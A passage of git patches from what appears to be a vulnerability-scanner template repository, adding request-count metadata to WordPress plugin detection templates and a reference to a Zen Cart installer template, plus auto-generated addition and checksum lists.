   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index 1773857e15..df2487955f 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
+    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index bcd1509c68..79ff01211c 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
+    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index c6aca20a60..23414b3d1d 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index 56dfdf4a59..fba45020e4 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 810fc82cde..0178c8e9fb 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
+    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 2276545093..017cf76f11 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
+    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index 783d381ed8..a04ddc6003 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
+    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 27f6d46c2b..bc83478f06 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
+    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index ab61cc0338..dedd2e23b6 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
+    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 5f6fbc1f75..03cd7137a8 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index d67150d038..a68d4b7d78 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
+    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index beeba7ca69..bf9dfc3ad8 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index c225df7bfd..47911a86a5 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index aaad04cb76..1c25b6f488 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
+    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index ff750a7d2a..b36317acd8 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
+    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index f1e7595ccd..5eb35dd17e 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
+    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index 4b2769ee46..ceb2b8d600 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
+    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 39bde187ad97c03f6850de2a8a7825cbd9330061 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Fri, 29 Sep 2023 11:05:56 +0530
Subject: [PATCH 0592/1090] Update zencart-installer.yaml

---
 http/misconfiguration/installer/zencart-installer.yaml | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/http/misconfiguration/installer/zencart-installer.yaml b/http/misconfiguration/installer/zencart-installer.yaml
index a6ae697c00..b4fa8ef2ea 100644
--- a/http/misconfiguration/installer/zencart-installer.yaml
+++ b/http/misconfiguration/installer/zencart-installer.yaml
@@ -4,6 +4,8 @@ info:
   name: Zen Cart Installer
   author: DhiyaneshDk
   severity: high
+  reference:
+    - https://www.zen-cart.com/
   metadata:
     max-request: 1
     verified: true

From b236b18dbe96a8134c8fc46c37c5f7a73ec0cbb4 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 29 Sep 2023 05:40:08 +0000
Subject: [PATCH 0593/1090] Auto Generated New Template Addition List [Fri Sep
 29 05:40:07 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 4478f0c4bf..c3bd892680 100644
--- a/.new-additions
+++ b/.new-additions
@@ -17,4 +17,5 @@ http/misconfiguration/installer/mantisbt-installer.yaml
 http/misconfiguration/installer/ojs-installer.yaml
 http/misconfiguration/installer/vironeer-installer.yaml
 http/misconfiguration/installer/zabbix-installer.yaml
+http/misconfiguration/installer/zencart-installer.yaml
 http/technologies/blazor-webassembly-detect.yaml

From a248bcf19cdb42275964da1650b83f60b8eec1ec Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 29 Sep 2023 05:40:15 +0000
Subject: [PATCH 0594/1090] Auto Generated Templates Checksum [Fri Sep 29
 05:40:15 UTC 2023] :robot:

---
 templates-checksum.txt | 403 +++++++++++++++++++++--------------------
 1 file changed, 202 insertions(+), 201 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 5c5a4fcbf7..29b09ce174 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -4566,6 +4566,7 @@ http/misconfiguration/installer/webuzo-installer.yaml:af0d1ac1efe2f187e932031756
 http/misconfiguration/installer/wp-install.yaml:7263f4ac7377b12614b0480f0da9c47264a8854e
 http/misconfiguration/installer/yzmcms-installer.yaml:444353079eddec6a26731f0f1834af2c6be6cf48
 http/misconfiguration/installer/zabbix-installer.yaml:171ff0d961a9bb903432c1ccab809f3d75174a4c
+http/misconfiguration/installer/zencart-installer.yaml:f98eec0d840941f5c9218fdf3310a83214427127
 http/misconfiguration/installer/zenphoto-setup.yaml:9730edcaf481dd4e868f956e698001f4bdf268ed
 http/misconfiguration/internal-ip-disclosure.yaml:5b172cc1e7c7baa6ab5dfd5ac833c27175ebf020
 http/misconfiguration/iot-vdme-simulator.yaml:20c893d91d0de38290ec70c12bb5003944c68f84
@@ -5865,218 +5866,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
-http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
+http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
+http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
-http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
-http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
-http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
-http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
-http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
-http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
-http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
-http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
-http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
-http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
-http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
-http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
-http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
+http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
+http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
+http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
+http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
+http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
+http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
+http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
+http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
+http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
+http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
+http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
+http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
+http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
-http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
-http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
-http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
-http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
-http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
-http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
-http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
-http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
-http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
-http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
-http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
-http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
+http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
+http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
+http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
+http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
+http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
+http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
+http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
+http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
+http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
+http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
+http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
+http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
+http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
-http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
-http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
-http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
-http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
-http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
-http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
-http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
-http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33
-http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d
-http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
-http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
-http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
+http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
+http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
+http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
+http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
+http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
+http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
+http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
+http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
+http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
+http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053
+http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
+http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
+http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
